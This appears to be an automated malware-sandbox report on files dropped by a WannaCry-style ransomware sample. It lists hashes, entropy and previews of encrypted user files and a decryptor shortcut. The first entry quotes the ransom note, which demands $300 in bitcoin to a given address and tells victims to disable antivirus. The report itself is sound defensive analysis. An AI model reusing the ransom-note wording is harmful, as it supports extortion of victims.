                                SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                Malicious:false
                                Reputation:unknown
                                Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                C:\Users\user\Desktop\PIVFAGEAAV\@WanaDecryptor@.exe.lnk

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Dec 31 15:12:56 2022, mtime=Sat Dec 31 15:12:56 2022, atime=Fri May 12 01:22:56 2017, length=245760, window=hide
                                Category:dropped
                                Size (bytes):577
                                Entropy (8bit):5.168523111223376
                                Encrypted:false
                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                C:\Users\user\Desktop\PIVFAGEAAV\BNAGMGSPLO.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.821689998719985
                                Encrypted:false
                                SSDEEP:24:NGsYqrUYhPZ9XjlGpCTJAa37z3wBZSFfHdmWPI2OWaB9m:wsYqoSDGpCN3z3wBo9Q2haB9m
                                MD5:0F5320372A87D61D3B47215C2FBC3815
                                SHA1:1E53262F7BE9C62A3EB9573FD147599EC322DAC7
                                SHA-256:9E0BCADC941715BEA1FD36D492EADC172C48159751DAC28E388B6890399FF340
                                SHA-512:146C2F6118FDE29433D1C25A5000E410C35D1B3535BFCE45C70A3D62AB937C7C5F84C12C4CA85768AD45AC9EFC8C38D9E46D276B2071E1181492FC737217D352
                                Malicious:false
                                Reputation:unknown
                                Preview:...V..U.JL...*q.......#.?v.....|.I"z.'..;Y...m5T.\......J.....)9dGQ...n.7uRr5..b.....A...s...8R.`..(.9.T"Ry....?...F-.@q<...\...?..A. ...: ..v....7i\@#X.n....bw.%.q..-_.sWI..#.h.....L...d,u.n...y..1...:..9.n.H.......o.i}....~.d(...M.].#_.l..M...l2.t.D.W.N........a.,..g...`.k...[^~}.T(...,.7. ..|}Agwk....l.....-VYX.W.5.<&....y.O.L.Ssj....k..I.}..@....'...+.?9..Y.!..4..y.....)...fj=9....V..7..2...~.(.&....8...>.../.c. .L..A......f/.....".=.+4.,.un...G......&3.X.E..X?.9.... .F" .x.j.<.<X.Y3.dc~.@D.c...n2.d=..^U.;O.........=.E..%y...Wb.C}g.=l..Hc.n.:.I..]...1.\"..Z..... ..y4...........#.O...."...-... .?B.Oy.P.%...j....2.........#.^..%.b}....Q..\...J.Y.&....3....0...%M....e.Bi..Q\K...Z..pL.b.`....e....T.,^..V..O..!..U..|..eX..._..3.4..-~9a.\...2..>.*..-S.?.|..jS..&-..W..........Ui..Z..T!%^.....B.....7..Q...Je-\\.....QmG.3!.:..0`Cn.....X.,..[$..Z.2..?.......2%...J.D...s...H7.u.#...NR....4.k..........B.....^..1W.._...zO.D}..#E'.b..^16K....

                                C:\Users\user\Desktop\PIVFAGEAAV\BNAGMGSPLO.xlsx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.847547959070516
                                Encrypted:false
                                SSDEEP:24:bkC/azcH2dCRxt92PyRhT3HmxDIP82+6WA90KwRKAGvL+Punf06Ehd:bkCacH2dyxt92PyRhG+8X690XRCT+WD+
                                MD5:38207A629C2748ED126F4305CA232931
                                SHA1:2C064E43C8329061811110CEE0E058A503DF7FF9
                                SHA-256:2F3794AD3C0A41BF93389EA5AF42CD48F93A7B296713F201B0CE1A841576E6F7
                                SHA-512:733E3855B75AE464720FA4398D85D2F88BB899AEF25236E116709E27C9C48A248C1EF186AEF750F25590F5C3DE9603AF921D3B319AFCD46C734F0D0AA26A7CB5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......B..50.*K".y.m.cq~..;.$........~.'...c.'U..|........)yr.P.4:...fH..G..s..Si...Li...&9..G..S4.....NJ.db.5Zh.d.Q.0..\...+x.............N&..3..q..q.a0...t3.../p...3.`..S+.....fJ ..0...Zn.@e..<.....p.u6..... ..b.h.......".5$..P.%......l..e....................`.F.....k.j....k`..R.......x\..4.....`.kTj. =.. .&..}'...<P'..j...D...r...F,B.F.w....>.....O,.J.=y...D....$Fo.h4..bw]A.l7)..KC......l.V#.]...e}.p.c..?..Gjc=).e.1.>..L.w..m..@M.U...Q..<.r.<.q.P........oA....g{...................x.o..@Q...6#N.O....k...3.Y..N..}..t.D7..Gv..)..b. . ..]FH..&....`.V..Y.4R}.2..E.3..+...?]v........>.-,....TEy..s.K6.@-...;..p..i.c_.Q....;.\.#..X.;.S........D...n.^.`.\. .....#......`..G.....Ee-.:..P..R(u9)...h.`c.D.....W....".N./6...M.........u.\..g.k.!.$...P{....6..yK..3./......'.g.8Ye.V. 0../............N.|$O.......>....4...|.$.P.d...6.........K.=/.G..........)..2C...._....D.....[,2]L...D...[.....iP.].3.e.7 ..#.@$..,.<..X`.f..u..4....1....3a.

                                C:\Users\user\Desktop\PIVFAGEAAV\BNAGMGSPLO.xlsx.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.847547959070516
                                Encrypted:false
                                SSDEEP:24:bkC/azcH2dCRxt92PyRhT3HmxDIP82+6WA90KwRKAGvL+Punf06Ehd:bkCacH2dyxt92PyRhG+8X690XRCT+WD+
                                MD5:38207A629C2748ED126F4305CA232931
                                SHA1:2C064E43C8329061811110CEE0E058A503DF7FF9
                                SHA-256:2F3794AD3C0A41BF93389EA5AF42CD48F93A7B296713F201B0CE1A841576E6F7
                                SHA-512:733E3855B75AE464720FA4398D85D2F88BB899AEF25236E116709E27C9C48A248C1EF186AEF750F25590F5C3DE9603AF921D3B319AFCD46C734F0D0AA26A7CB5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......B..50.*K".y.m.cq~..;.$........~.'...c.'U..|........)yr.P.4:...fH..G..s..Si...Li...&9..G..S4.....NJ.db.5Zh.d.Q.0..\...+x.............N&..3..q..q.a0...t3.../p...3.`..S+.....fJ ..0...Zn.@e..<.....p.u6..... ..b.h.......".5$..P.%......l..e....................`.F.....k.j....k`..R.......x\..4.....`.kTj. =.. .&..}'...<P'..j...D...r...F,B.F.w....>.....O,.J.=y...D....$Fo.h4..bw]A.l7)..KC......l.V#.]...e}.p.c..?..Gjc=).e.1.>..L.w..m..@M.U...Q..<.r.<.q.P........oA....g{...................x.o..@Q...6#N.O....k...3.Y..N..}..t.D7..Gv..)..b. . ..]FH..&....`.V..Y.4R}.2..E.3..+...?]v........>.-,....TEy..s.K6.@-...;..p..i.c_.Q....;.\.#..X.;.S........D...n.^.`.\. .....#......`..G.....Ee-.:..P..R(u9)...h.`c.D.....W....".N./6...M.........u.\..g.k.!.$...P{....6..yK..3./......'.g.8Ye.V. 0../............N.|$O.......>....4...|.$.P.d...6.........K.=/.G..........)..2C...._....D.....[,2]L...D...[.....iP.].3.e.7 ..#.@$..,.<..X`.f..u..4....1....3a.

                                C:\Users\user\Desktop\PIVFAGEAAV\EEGWXUHVUG.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.825383008262881
                                Encrypted:false
                                SSDEEP:24:2liK6PuY0lxHhfZRupn9fo70dR6mGq3Y3i1H8wfjf6:SijuYSxHJZRkVzYSRy
                                MD5:9E1835870223FC3D21AF2984503769FE
                                SHA1:7D20C2CC66CCF615E9DFAF94673B4CDD0AF8E76D
                                SHA-256:9775D3F42FD590FC6E6C02AD2F4AD0B113BBEED0025D7EE6D2A6CD41C98A7427
                                SHA-512:645A487F54FFA084A38815406E31CF0245BF2238DC16D186FADD1824BAEE31EB4CE1541603CF9400821E77E1D200D6E9CFB3F49EEEEDAA4709C178D0B2B331F2
                                Malicious:true
                                Reputation:unknown
                                Preview:..y....}...T:.6[.Y)}...z..... l.J)r...,..*X?.J...r..:.M..."+.....k.N..q.8C.......$Y'kf....I.*(W...o...c....o.8k..].gL......*6:.L..{..Q...y.(?.<1>N......Y.a..Z..&...[.......(.|M.2.[...1.....Q..H=Fb..Z..q..l.U..v.@....S.l|.<.%g...@h.@...;..l].K...i.!...UM:...qS........v.oh!.....9..|....*......V.Y.ND.B4..6e.Ow..]........3GU+5O...].....q....P.d.......h..B....m..]..,....F..?...t..t0b}.%.N.@O.F.rj/(0SE..N....i;.(..,.9X.I.w...}.&m.Te.a....<.xJV<.k.....v...q.Y..j.,F(.....u.AQ..9....].*..m.m..>.E..Lpf.;....r.O..Hm..R...>...;)..G.Ay....o?.ay.F...o=.G....9.`|;.`Z...b..#.X...f..&]8K.dn.,.Ey.}....KZG_....A..\..a,\,.O#...l6.f.., 2?..7.-.2._....~.k4.....u..2..&p.yY..k.$w.&s.'1..R.<.2.......n.....8.!.-x........F.......It^.{0q....A.ja..3JH... ...cC.j..w.I.T...bJ.Q...Oz5..{.....9..L...?.<`Z.........;P.#.6..>J.........S.. .&..`...l%T(.a....'.....#ym../....A=...sS&m:N..N1>.|..q...3E.)...?.HP.,."w.4.1n..._..%..Z=...fiH-..n.4N.....g.:.."@.e.5.b..Q.....

                                C:\Users\user\Desktop\PIVFAGEAAV\EEGWXUHVUG.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843636029897996
                                Encrypted:false
                                SSDEEP:24:bkkv64X+l65cKaas7QJDtqQr/v+HQSjMlBl9o/gt/65L+srNVh23Fn:bkkvpuXK47QJx3r/FkM3XBM6srDQ3Fn
                                MD5:285AB0B9879CF2CD3D6B36B119D62B2A
                                SHA1:E878DE0036F907D7E7DD8D942D1FF73D317D110A
                                SHA-256:7EC515EF5DB0932FCE47DFAE0B4457ACEF3328223C8C700BB5DC9338CCC6FCA8
                                SHA-512:4A42C9CED3010ABF343A955FF1217E8E4794CAEF0DEB96831E43DBA6609006922AFB34D6D3419ADE445CFAEEDE7AB352FE0F594AA5848EC60D2691B0F31FB0B5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....ES..n.JL.....R.Y..a..........8j..0 .L.!..%...i;3.o...'.%$l.6.#..)R.9Rw.....8*)..l..@(.[)..N....|u..V.t........I).`...O....m......S_..v..K.h3.u..T..W2..?t.^..Y.:E.C.T.'"......#.....s.vzG...ODZ.0.v?GZ{>[JIE...d.e$,.R.t...,.Ls#.0.H.W.j..aH...x..................&.Q[.%....n..@.U..".xY).7/).g?.t.fv....j......i.B..{"S.<.....".....V).A...X.z...L2A.....8....;<...L...P8h~...+M|..E........z~...{.....y.....j|..08.....H...Q......l<.-..x.F.%......q...@b}^.}.8.......q vs....;Q..=.h.HQ..<.m..`...A..i.....fi..lB(..i....TQ.t..p^L.P..4.2..!gZ/.gr.N.^h#k....P#.....|G.l.]P$.....F..dlFL...(.;..u...ktjW..xx#...@Q.....p.Vgm...!..<.Ot.<jTY!.fI.....XE...5......5.f).t.E.i.X....1..ym.t).xm.....j....+...3t....w...Jt..[9..`.....aj......#>.`....E....2...~4..}z|h.../O:.:. R_.x...|..q>.....z}+......2}...x<%...C...K..>.$.Qrj.*. T....*..b.XA...R.w..&.>.....n._Z..E..cwj....].D,.NU.WC.w...54..*@..X.:@...i............4v....,..p.WA/..L...%...~...`rL...q....

                                C:\Users\user\Desktop\PIVFAGEAAV\EEGWXUHVUG.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843636029897996
                                Encrypted:false
                                SSDEEP:24:bkkv64X+l65cKaas7QJDtqQr/v+HQSjMlBl9o/gt/65L+srNVh23Fn:bkkvpuXK47QJx3r/FkM3XBM6srDQ3Fn
                                MD5:285AB0B9879CF2CD3D6B36B119D62B2A
                                SHA1:E878DE0036F907D7E7DD8D942D1FF73D317D110A
                                SHA-256:7EC515EF5DB0932FCE47DFAE0B4457ACEF3328223C8C700BB5DC9338CCC6FCA8
                                SHA-512:4A42C9CED3010ABF343A955FF1217E8E4794CAEF0DEB96831E43DBA6609006922AFB34D6D3419ADE445CFAEEDE7AB352FE0F594AA5848EC60D2691B0F31FB0B5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....ES..n.JL.....R.Y..a..........8j..0 .L.!..%...i;3.o...'.%$l.6.#..)R.9Rw.....8*)..l..@(.[)..N....|u..V.t........I).`...O....m......S_..v..K.h3.u..T..W2..?t.^..Y.:E.C.T.'"......#.....s.vzG...ODZ.0.v?GZ{>[JIE...d.e$,.R.t...,.Ls#.0.H.W.j..aH...x..................&.Q[.%....n..@.U..".xY).7/).g?.t.fv....j......i.B..{"S.<.....".....V).A...X.z...L2A.....8....;<...L...P8h~...+M|..E........z~...{.....y.....j|..08.....H...Q......l<.-..x.F.%......q...@b}^.}.8.......q vs....;Q..=.h.HQ..<.m..`...A..i.....fi..lB(..i....TQ.t..p^L.P..4.2..!gZ/.gr.N.^h#k....P#.....|G.l.]P$.....F..dlFL...(.;..u...ktjW..xx#...@Q.....p.Vgm...!..<.Ot.<jTY!.fI.....XE...5......5.f).t.E.i.X....1..ym.t).xm.....j....+...3t....w...Jt..[9..`.....aj......#>.`....E....2...~4..}z|h.../O:.:. R_.x...|..q>.....z}+......2}...x<%...C...K..>.$.Qrj.*. T....*..b.XA...R.w..&.>.....n._Z..E..cwj....].D,.NU.WC.w...54..*@..X.:@...i............4v....,..p.WA/..L...%...~...`rL...q....

                                C:\Users\user\Desktop\PIVFAGEAAV\EFOYFBOLXA.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.807597186214773
                                Encrypted:false
                                SSDEEP:24:4lwDhfyX1YujPBr/+BDsBVt2W6kkDsTK9YvdSXchwE9uch7K4MG6/l1awPz2:sO21YSP4at2W6kpKW4XcDuaxMGAfaw6
                                MD5:EC7D55E70F064DCE637E8621F5127B8C
                                SHA1:5B06575BFC5D2DE24BD4F78502E1DAAFBC5C82CB
                                SHA-256:56EE07AE62A5FE0930B24EB7FC003128582D9A059675119A19A28C17FD187D50
                                SHA-512:DC6D7B6D977939EE472DFD14FF5974FE7F788AB0FF34FB100AFC791CC70E7238252680EA82AE6FDBCD6957A21D079670A8DEF64E3CA2B4D0576397B179796FF7
                                Malicious:false
                                Reputation:unknown
                                Preview:..>BQ.`&.|/i....(..~c&....|.t..Ft.c.~Gy.....0..z+.@.@.w..jG7....O..........S...<..T.....G)_%..V...`.l/H..w...N...E.Nj.pfBG;d.. d...C....H.........WG.v.(.`~~]J.S...6...X..m...6..;h.T..-V9G.R.o...y....3..h3...}..\.H.s.7: .b%.&/Oq.t&.V....GR.G.@..j`h.#..............J.D.......B.2.N......#..I.~.....`...d..;Y..g]O.pX..'.Z.].O........E.A.1..........[.........qC..y.M....F-^w.L.n?1..4.../..Ql.ap.?[r..a.;.....3..t.4....@..>..+9"..J.~_.2..... S.;+..&{S:.@..1^.......[.:v..!N.?-..r..K7...@.2......1....S.........Pg|...&_.q..F..+.R0x......N.}........|%..._*.I.y.....0..'5...C.._......i:r.......j.....X.n...i.o*....U=..........X.N.1...v.M...y+..5,3.........w...E...nYM.2....1@P........Cc.(..W)...........%..Fc.g3..o.x..}..c+c..s..?..D*.6.V......Z....F.}: ..8...Cy..(k2>.tHm0_i.z.k...&....a...R.L..U1...u..Hd0.TYW.o.*..3.CM.J...........".6.}`.2.d...M...I....V..NZR...>....T;(h/P.....G/...!!3p.-.-8T..G.......1T<IF..6".W~3...o..<..rW..H..^...N.SKv..-......$.....K..U

                                C:\Users\user\Desktop\PIVFAGEAAV\EFOYFBOLXA.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843921930752668
                                Encrypted:false
                                SSDEEP:24:bkTSsNxrn+fMNvDxS1P9MKbF96xXGcUsPK30bgE9xOF74fQXn5O/:bkThxrnEerK/6xwL0UmC4wo
                                MD5:0C196C8A72098BA49555254F0B1C9699
                                SHA1:FF7864858F52E49AE41819F279CC02CDFAF283E2
                                SHA-256:DBADC92561A4A741C45E91E4F7F2E8E0B14380DE03F7CA89AAEA2E375EC22760
                                SHA-512:925FA1AD847C185127132F9ABB5A3D75D530B27554920D2FCB4570D83879BCCF0051EF76EC7BCC45976228ADD4956A4A1479A579E43BC75B69185EDC50B84DD7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....@9tc..A.....>....)..n.@F...:..O..h..m..!.U....o.wI9...NDz.'U.l.[.9.X...T-.B&...5.S.K..sD?6.......g..M.,a.[.U.....| ...!b.p.,n.$.b#.C.C.r)......c.v<.I..Q..c..J.C.....>..>c.: .Q.qO./;...'....?.hT]..we...MA.F*)T...]^........1B..........B.I'Rc.SW.r................2./JO25Z......!N^u)v~.hxx.z..{.......=U.a.s..98.%%.B...5...,..I...f..S....c.V7..E7.K...."w.21.KG..MPZ.....f!..&V.6....9.4.s.T...I<E.M{0.~j...D..|}..Q./3...;..Y...z.t.>.fT.K .....L....L.P._sz+.s..Qij...m.2.F.|.....W1w.......W..T..9.p]5s"..^.:^U?........H.....$..+L..i.._..".0..pv..0..)-'P*.`"x5.%..a....d..^hq3..pG.C...R...k.kf.0.... dF)..K...puQ.*...Ve..,9{.......v.a..'......... ?.f..2X....*.~...s.|...d.....{.m.G...H...w.....h.......`.9H...o..{r........6..._.......B.%.m..6...B?.9o@.NR7E.*.E..sD....|L.-.D.#.....lw..1.,.v5./..ln.....;.Q..8.t.>.e...S..O.....V.BtB...K......\..S..$.r.A.N.cv.D%..L....~.=i/s..V.B...dA.y.+....z.._......S.H.>..4,.$..<14..!9...W..K.....~R..Aw....`

                                C:\Users\user\Desktop\PIVFAGEAAV\EFOYFBOLXA.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843921930752668
                                Encrypted:false
                                SSDEEP:24:bkTSsNxrn+fMNvDxS1P9MKbF96xXGcUsPK30bgE9xOF74fQXn5O/:bkThxrnEerK/6xwL0UmC4wo
                                MD5:0C196C8A72098BA49555254F0B1C9699
                                SHA1:FF7864858F52E49AE41819F279CC02CDFAF283E2
                                SHA-256:DBADC92561A4A741C45E91E4F7F2E8E0B14380DE03F7CA89AAEA2E375EC22760
                                SHA-512:925FA1AD847C185127132F9ABB5A3D75D530B27554920D2FCB4570D83879BCCF0051EF76EC7BCC45976228ADD4956A4A1479A579E43BC75B69185EDC50B84DD7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....@9tc..A.....>....)..n.@F...:..O..h..m..!.U....o.wI9...NDz.'U.l.[.9.X...T-.B&...5.S.K..sD?6.......g..M.,a.[.U.....| ...!b.p.,n.$.b#.C.C.r)......c.v<.I..Q..c..J.C.....>..>c.: .Q.qO./;...'....?.hT]..we...MA.F*)T...]^........1B..........B.I'Rc.SW.r................2./JO25Z......!N^u)v~.hxx.z..{.......=U.a.s..98.%%.B...5...,..I...f..S....c.V7..E7.K...."w.21.KG..MPZ.....f!..&V.6....9.4.s.T...I<E.M{0.~j...D..|}..Q./3...;..Y...z.t.>.fT.K .....L....L.P._sz+.s..Qij...m.2.F.|.....W1w.......W..T..9.p]5s"..^.:^U?........H.....$..+L..i.._..".0..pv..0..)-'P*.`"x5.%..a....d..^hq3..pG.C...R...k.kf.0.... dF)..K...puQ.*...Ve..,9{.......v.a..'......... ?.f..2X....*.~...s.|...d.....{.m.G...H...w.....h.......`.9H...o..{r........6..._.......B.%.m..6...B?.9o@.NR7E.*.E..sD....|L.-.D.#.....lw..1.,.v5./..ln.....;.Q..8.t.>.e...S..O.....V.BtB...K......\..S..$.r.A.N.cv.D%..L....~.=i/s..V.B...dA.y.+....z.._......S.H.>..4,.$..<14..!9...W..K.....~R..Aw....`

                                C:\Users\user\Desktop\PIVFAGEAAV\NVWZAPQSQL.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8291609997912746
                                Encrypted:false
                                SSDEEP:24:an8Mc430gzbB1dFOd9wzpuqXF5v4CD9jPWhLuYotN:rMcM0obB3w9wzbv4ChLWhLuYe
                                MD5:1CEB65BE7B53214D0287AEB8B6F02FBB
                                SHA1:34099CFC592C9096A00BB77EFA10C3081DF3D398
                                SHA-256:47C9C7F6CDF1754F0A18B9F28C5B66E2C690CEF8727D5DF279040BF3A597904A
                                SHA-512:20A5A0B7646A4568D8FFDD9E5B864D5F2EF600BE84E4C5851BAC9D263950E37E03846022F304EBD25D3C2FD3631481421C4179F253C00C59C3FEA6F88D70AB6D
                                Malicious:false
                                Reputation:unknown
                                Preview:.QM....6..u$.. Q......YRD.g.l.m...c......o...A.y5...<....<..p........OK.KO.i.w2.V..H.S....j.x<'G0S.......N...Yp.M..@.....mK..%...q..:.6..F.g..r$.....o..].....ON7o.-.\..q....N.E..V.'..../..]..6d..;...u..&.k...K%Df.@.ZUD...........x....1,Z....9...>...@..u..\..A.....<....>K..a...mv.%n...W.mG-..Ld5o.'.j.....c..H.....Y.g..P:Y...V.?....]H0..2..^....|s...O.[.i.K.fQ...Pj.i.|w..yG5.........O}.h.i.vU..3g..p.../8N({.nn..#=........ [t...b...nL.. _....h'......~...d....P....r&g....\W].......Ee\g.i.*...g...w.}j.EC.x....?k$....|...>.wo&jx...EQ'n.mlIBKNmq...Y...=.!..K.nj.]C.a.#.a........5?|..g|x.2.9E......!...I-..{n.....@..].Fc...F.....bV.[1.y.W=">.....r..\....D.y.e.y;D.....m..E}:X1...SW.....`F.......0.o(....v...> .)..D.U.]............j..'.;..I..d..)=.M.....q...F./...b..Aq...;..o...8.l+.Y)...X.6.X.<....._.........(..Z..a3.ZK.V..+#.J.0..Fs../zO......h0....zD./&.=36Y[P..V./`A..r1....N.Z.0u.....M.j.=.K..._.eN...z.~..2.SB..+.9.....A..(u;..h.%.lF...U.D9|..Mc.HT.`{

                                C:\Users\user\Desktop\PIVFAGEAAV\NVWZAPQSQL.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.820626981448829
                                Encrypted:false
                                SSDEEP:24:bk+Ay8TW0+6zrG/TyfoDZ0tKkS6zY3ZsKRfSZx/ZWxvq88q3rQnqhSzJBfHHP:bkfPd+6/GsMIKkx8psSfS1WxB8urcBfP
                                MD5:BFB9A34DC13932FCF7439A4722F9A7B6
                                SHA1:32478236D331CB78D621ED71A675938E320913CE
                                SHA-256:003483509F2C17417115B3325DDD365E9C5203DEF8748F7EC2EFA80CC480657C
                                SHA-512:AAD93E1EC8256295BF7E45F6E446747E649E2F4C43122E6F40A8BED10CAA5B8F0967BE277F2885BB2A747B167FBAFC2936B10E2D1E85E6A2CA4DD1E0B0C2263F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......cwn.*...z(h0.X...n.7K.......G.]..lN........N$+A...<..T...C.Y....Vz...s....JI..$...).}L.d.csdd...V.)`..i.G...KP4G)<.@VT/.Q9..-m{Ko.B._;./...4JY.w....qp.H..5w....).......g..c..&R..N.,.........G..%@.6w...GKc.yz...#+......v....M..M.......f....N................R...W7.|..Y....'(.....T.............Y......*3...(l?:m.Z..\.5r.h_...Dv0.N..I.e.Te<Hy...^..I7I........./..(k..cx[M........^.....|b.2.Y..P......0;.BFHC....e.....a.@.s....l.z.K...U.e....7..f..L..........P..(..E.a...s.:J...x....}u..`..g..m54...]lB...T.}.w*...O......7.G']".[w....~..-..#...S.z7.......e.. <*..v..z.Mt.&1..!^..U.i.N%7$<..9.!..J..X.|.....6$.....|Vy.<..._..]!..u...-.....MT...!.L.[M..D........wv.W()........:... .."z......./.c..+.. ...b-..:......_.;.ov.@%..0.#.k..sZ..<.......f6_%WxT.I|o...[XK....Z.<7.T.nZ..~X....9../I.o.G....(.z....%.).....4:J.ipM.......K.r.K(.Q.gz.Z.......;i.J..l......5m...>.3<..7.X.u.Z[.......c.i..........]..{....I.)4...z.....,.Q..L.]..+x....=..i...<.W...iB/wUg7

                                C:\Users\user\Desktop\PIVFAGEAAV\NVWZAPQSQL.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.820626981448829
                                Encrypted:false
                                SSDEEP:24:bk+Ay8TW0+6zrG/TyfoDZ0tKkS6zY3ZsKRfSZx/ZWxvq88q3rQnqhSzJBfHHP:bkfPd+6/GsMIKkx8psSfS1WxB8urcBfP
                                MD5:BFB9A34DC13932FCF7439A4722F9A7B6
                                SHA1:32478236D331CB78D621ED71A675938E320913CE
                                SHA-256:003483509F2C17417115B3325DDD365E9C5203DEF8748F7EC2EFA80CC480657C
                                SHA-512:AAD93E1EC8256295BF7E45F6E446747E649E2F4C43122E6F40A8BED10CAA5B8F0967BE277F2885BB2A747B167FBAFC2936B10E2D1E85E6A2CA4DD1E0B0C2263F
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......cwn.*...z(h0.X...n.7K.......G.]..lN........N$+A...<..T...C.Y....Vz...s....JI..$...).}L.d.csdd...V.)`..i.G...KP4G)<.@VT/.Q9..-m{Ko.B._;./...4JY.w....qp.H..5w....).......g..c..&R..N.,.........G..%@.6w...GKc.yz...#+......v....M..M.......f....N................R...W7.|..Y....'(.....T.............Y......*3...(l?:m.Z..\.5r.h_...Dv0.N..I.e.Te<Hy...^..I7I........./..(k..cx[M........^.....|b.2.Y..P......0;.BFHC....e.....a.@.s....l.z.K...U.e....7..f..L..........P..(..E.a...s.:J...x....}u..`..g..m54...]lB...T.}.w*...O......7.G']".[w....~..-..#...S.z7.......e.. <*..v..z.Mt.&1..!^..U.i.N%7$<..9.!..J..X.|.....6$.....|Vy.<..._..]!..u...-.....MT...!.L.[M..D........wv.W()........:... .."z......./.c..+.. ...b-..:......_.;.ov.@%..0.#.k..sZ..<.......f6_%WxT.I|o...[XK....Z.<7.T.nZ..~X....9../I.o.G....(.z....%.).....4:J.ipM.......K.r.K(.Q.gz.Z.......;i.J..l......5m...>.3<..7.X.u.Z[.......c.i..........]..{....I.)4...z.....,.Q..L.]..+x....=..i...<.W...iB/wUg7

                                C:\Users\user\Desktop\PIVFAGEAAV\PIVFAGEAAV.docx

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.812031174501806
                                Encrypted:false
                                SSDEEP:24:lyOB9TgMl5rT1qmfOfY8A1wn2YCmJCtrL/6cVgy:YyT7rTtrfrpgy
                                MD5:DFDC4CF8484A70958078D41B9B93BDA4
                                SHA1:9AF22447A6E17AF7EB797C047B7E7C23FA10E739
                                SHA-256:B62D590AA815E82D9827826CC79C29031082C7E3F750D31FED961D30F8D04B45
                                SHA-512:4780925D02F8D2338EDA9F9BF3FAB655C18D184F43649572F78F29D4604081E3B9560AA97DA6929ABCFD4537760C0F25CD1F159AA10F138E46623388AB4E6311
                                Malicious:false
                                Reputation:unknown
